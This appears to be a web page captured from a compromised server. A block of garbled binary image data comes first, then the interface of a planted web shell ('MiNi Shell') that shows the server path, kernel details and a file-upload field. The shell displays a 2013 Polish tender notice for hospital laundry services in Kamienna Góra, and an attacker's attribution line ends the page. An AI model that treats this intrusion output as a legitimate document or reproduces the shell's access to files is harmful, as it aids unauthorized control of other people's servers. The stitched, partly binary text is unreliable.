JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131127/254611-N-2013.html

<p class="kh_header"><b>Kamienna Góra: Świadczenie usług   prania, prasowania, naprawiania, maglowania bielizny, pościeli szpitalnej dla pacjentów oraz odzieży ochronnej pracowników  
PCZ w Kamiennej Górze Sp.   z o. o.</b><br>
<b>Numer ogłoszenia: 254611 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 75 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług   prania, prasowania, naprawiania, maglowania bielizny, pościeli szpitalnej dla pacjentów oraz odzieży ochronnej pracowników  
PCZ w Kamiennej Górze Sp.   z o. o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług prania, prasowania, naprawiania, maglowania bielizny i  pościeli szpitalnej dla pacjentów oraz odzieży roboczej pracowników  Powiatowego  Centrum Zdrowia w Kamiennej Górze Sp z o. o.

Usługi te będą wykonywane poza terenem szpitala. 
Asortyment objęty zamówieniem  jest zamieszczony w załączniku nr 3  - WYKAZ  BIELIZNY I POŚCIELI SZPITALNEJ BĘDĄCEJ PRZEDMIOTEM USŁUGI.  ZAKRES CZYNNOŚCI ZWIĄZANYCH Z WYKONYWANIEM NINIEJSZEJ USŁUGI został podany w zał 1.   HARMONOGRAM USŁUGI stanowi załącznik nr 2.  Dostawa i odbiór bielizny odbywać się będzie zgodnie z wymogami sanitarno-epidemiologicznymi przez pięc dni w tygodniu: poniedziałek, wtorek, środa, czwartek i piątek. Jakość odbieranej pościeli z pralni sprawdza pracownik odbierający. Zamawiający przewiduje dostarczanie całości posiadanego asortymentu: bielizny, pościeli szpitalnej oraz odzieży roboczej  pracowników w przewidywanej ilości około 4 tony  miesięcznie wg ustalonego harmonogramu dostaw między Stronami. Wykonawca zapewni rytmiczne pranie bielizny zgodnie z ustalonym harmonogramem dostaw a w przypadkach szczególnych przyspieszy termin wykonania usługi (bielizna operacyjna). Dla zapewnienia minimum sanitarnego w czasie transportu odebranej bielizny szpitalnej  z zakładu pralniczego wykonawca zapewnia: pakowanie wypranej pościeli  w podwójne worki foliowe, dezynfekcję środków transportu oraz transport odzieży ochronnej na wieszakach, natomiast zamawiający zapewnia: pakowanie brudnej bielizny w worki foliowe do transportu do pralni.  
             Natomiast Wykonawca przedłoży  wykaz przewidzianych do wykonania zamówienia środków  piorących  zatwierdzonych przez PZH - zał nr 4 oraz wykaz przewidzianych do wykonania zamówienia środków  dezynfekujących   zatwierdzonych przez PZH - zał nr  5. 
         Usługi prania będą, podlegały ocenie wewnętrznej Zamawiającego.  Zamawiający wyznaczy Naczelną pielęgniarkę i pielęgniarke epidemiologiczną do nadzoru dostarczanej bielizny  oraz do bezpośredniego kontaktu w sprawach utrzymania reżimu sanitarnego świadczonej usługi. Do uzgodnienia spraw związanych z wypełnianiem warunków umowy ze strony Zamawiającego jest uprawniony pani mgr Bogumiła Pawlukiewicz - Naczelna pielęgniarka.
  Przewidywany czas trwania umowy: 36 miesięcy od momentu zawarcia umowy.
W celu realizacji zamówienia Wykonawcy powinni: 
1) Spełniać  warunki podstawowe przedmiotu zamówienia określone w  rozdziale   I i II oraz  inne wymogi określone w siwz w tym również  projektu umowy;
3) Dostarczyć  ofertę sporządzoną wg siwz wraz z wypełnionymi następującymi formularzami określonymi w rozdziale III;
4) Zdobyć   wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia;
5) Przedstawić wykaz niezbędnych  do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca;
6) Przedstawi wykaz środków piorących i dezynfekujących zatwierdzonych przez PZH;
7) Organizacja  i technologia prania stosowana u Wykonawcy winna odpowiadać przepisom  Rozporządzenia Ministra Zdrowia i Opieki Społecznej  z dn. 02.02.2011r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. 2011r. Nr 31, poz. 158);
8) Wykonawca winien  przestrzegać  przepisy ustawy z dn. 05.12.2008r. o zapobieganiu i zwalczaniu chorób zakaźnych (Dz. U. z 2013r. Nr 947), wytycznych SANEPID-u , PIS-u, bhp oraz innych związanych z  danym rodzajem działalności; 
9) zapewnić dostawę i odbiór pościeli i bielizny szpitalnej zgodnie z wymogami sanitarno-epidemiologicznymi 5 razy w tygodniu, tj. poniedziałek, wtorek, środę, czwartek i  piątek. Takie ustawienie dostaw i odbiorów zapewnia nam ciągłość i systematyczność realizacji usług prania,  szczególnie jeśli chodzi o pranie bielizny  z bloku operacyjnego oraz oddziałów potrzebujących większej częstotliwości wymian będą realizowane po ich telefonicznym zgłoszeniu;
10)  wykonywać usługi prania bielizny i pościeli szpitalnej wyłącznie wg dziennych potrzeb szpitala (pościel i  bielizna szpitalna   będzie dostarczana i odbierana przez upoważnionych pracowników w ilościach wynikających z dziennego zużycia);
11)   zdawać czystą pościel nie później niż w ciągu 24 godzin w wyżej wymienionych dniach;
12) przejąć  pełną odpowiedzialność za stan sanitarno - epidemiologiczny  wynikający z zakresu świadczonych usług tj.  przed SSE, WSSE oraz  innymi organami kontroli placówek służby zdrowia w zakresie świadczonej usługi pralniczej;
13)  stosowana przez Wykonawcę  technologia prania, środki piorące, jakość, transport wewnętrzny i zewnętrzny winien być zgodny z obowiązującymi przepisami;
14)  środki transportowe winny być przystosowane do przewozu bielizny i pościeli szpitalnej (pojazdy i środki transportu przeznaczone do transportu bielizny winny być na bieżąco  poddawane  myciu i dezynfekcji); 
15)  odbiór  i zdawanie prania odbywać się będzie na podstawie kwitów zdawczo-odbiorczych obustronnie potwierdzonych i zawierających asortyment,  ilość sztuk w asortymencie podanym przez zamawiającego;
16) Wykonawca nie powinien posiadać żadnych spraw PIH, SANEPID-u i PIS-u oraz nie być karany sądownie w szczególności za sprawy związane z procedurami o zamówienie publiczne;
17) Wykonawca winien spełniać wymagania dotyczące warunków higieniczno-sanitarnych na świadczenie usług pralniczych dla służby zdrowia, tj. zgodne z zaleceniami SANEPID-u, PIH-u, czy PIS-u zarówno w zakresie stosowanej technologii prania, maglowania, dezynfekcji, konfekcjonowania bielizny, jak i jej dostaw do odbiorcy;
18) Oferent winien posiadać niezbędne uprawnienia  do wykonania przedmiotu zamówienia - jak również umiejętności i wiedzy w zakresie dezynfekcji bielizny i pościeli szpitalnej;
19) Oferent winien posiadać nowoczesne wyposażenie techniczne (pralnice);
20) Oferent zobowiązuje się wykonać całość przedmiotu zamówienia, tj. pranie i dezynfekcja chemiczno-termiczna bielizny szpitalnej, operacyjnej, noworodkowej i dziecięcej,  poduszek, kocy, parawanów,  firan, materacy i żaluzji;
21) Sprzęt i środki  chemiczne, których wykonawca będzie używał do wykonywania usługi winny spełniać warunki takie, jak sprzęt stosowany w placówkach służby zdrowia i być dopuszczone do obrotu w  placówkach służby zdrowia;
22) Pokryje koszty mediów (woda, energia elektryczna, detergenty itp.)
23) Wykonawca zobowiązuje się do wykonania usług z zachowaniem wszelkich przepisów i barier sanitarno-higienicznych jakie są wymagane do tego rodzaju usług;
24) Wykonawca będzie odpowiadał bezpośrednio przed organami nadzorująco - kontrolnymi za utrzymanie   reżimu sanitarnego (SSE i WSSE) w zakresie świadczonej usługi pralniczej. Każdorazowe stwierdzenie niewykonania lub nienależytego  wykonania usługi przez Wykonawcę wymaga udokumentowania w protokole podpisanym przez obustronną komisję złożoną z upoważnionych przedstawicieli Wykonawcy i Zamawiającego z wyznaczeniem dodatkowego terminu do dokonania poprawek. Usługę uważa się za wykonaną prawidłowo, gdy Wykonawca usunie uchybienia w wyznaczonym terminie przez Zamawiającego. W przypadku uszkodzenia lub zaginięcia asortymentu  Wykonawca zobowiązany jest do zakupu tych rzeczy.    W przypadku bezskutecznego upływu terminu wyznaczonego na usuniecie uchybień, Zamawiający zastrzega sobie prawo do naliczenia kary umownej w wysokości 10% wartości niewykonanej usługi. 
25) Wykonawca będzie wykonywał usługi prania przy pomocy własnych mocy przerobowych (parku maszynowego itp).  
26) Dostawa i odbiór bielizny odbywać się będzie na  koszt i ryzyko wykonawcy (koszty transportu bielizny  i ubezpieczenia w   transporcie poniesie Wykonawca)
27)  Uwzględni wszystkie prace i czynności  opisane w siwz związane z przedmiotową  usługą  - podane czynności  nie będą dodatkowo opłacone po zawarciu umowy i w trakcie wykonywania usługi, gdyż zamawiający przyjmuje, że ich koszt został pokryty przez inne ceny podane w ofercie przetargowej.
28) Wykonawca przedstawi  technologię prania oraz schemat organizacyjny pralni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 93.10.00.00-9, 93.11.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, wykonał lub wykonuje usługę prania, prasowania, naprawiania, maglowania bielizny, pościeli szpitalnej dla pacjentów oraz odzieży ochronnej pracowników  
 na potrzeby zakładów ochrony zdrowia, 
b) Wykonawca winien wykazać, że posiada narzędzia, wyposażenia zakładu i urządzenia  techniczne  oraz środki piorące i dezynfekujące  dopuszczone obowiązującym prawem do obrotu w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę min. 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>9.10.1  opis technologii prania i dezynfekcji; 
9.10.2  schemat organizacyjny pralni szpitalnej ;
       9.10.3   zaświadczenia niezależnego podmiotu  podmiotu  zajmującego się poświadczeniem zgodności  

      działań    Wykonawcy z normami jakościowymi  potwierdzającego, że pomieszczenia  gdzie będą   
świadczone usługi prania  posiadają  barierę higieniczną i spełnia warunki sanitarno - higieniczne   
 zgodne z obowiązującymi   przepisami wymaganymi przy praniu bielizny ogólnoszpitalnej,    operacyjnej,  noworodkowej, zakaźnej,   skażonej (spełniają  wymogi   Rozporządzenia Ministra Zdrowia i Opieki Społecznej  z dn. 10.11.2006r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. 2006r. Nr 213, poz. 1568); 
9.10.4 zaświadczenia podmiotu uprawnionego  do kontroli jakości potwierdzającego, że samochody używane przez Wykonawcę w celu  świadczenie usług transportowych dotyczących bielizny szpitalnej i bielizny lecznictwa otwartego, spełniają warunki bezpieczeństwa epidemiologicznego  z zachowaniem wymaganej bariery higienicznej i sanitarnej;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) wystąpi siła wyższa mająca wpływ na realizację umowy,
b) zaistnieje omyłka pisarska lub rachunkowa,
c) nieistotne zmiany umowy, 
    d)  zachodzi konieczność zmiany terminu wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego     
         przewidzieć w chwili podpisania umowy,
    e) niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest 
         konieczna w celu prawidłowego wykonania umowy,
    f)  jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację   
         przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT,
     g) zachodzi konieczność zmiany w zakresie podwykonawstwa,
         h) możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia ,
          i) nastąpiła zmiana danych Wykonawcy w tym min. formy organizacyjno - prawnej,
          j)  zmniejszenie lub zwiększenie tonażu prania, 
          k) waloryzacja cen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o. o.
			ul. Bohaterów Getta 10
			58-400 Kamienna Góra
dział zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 10:00, miejsce: Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o. o.
			ul. Bohaterów Getta 10
			58-400 Kamienna Góra
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com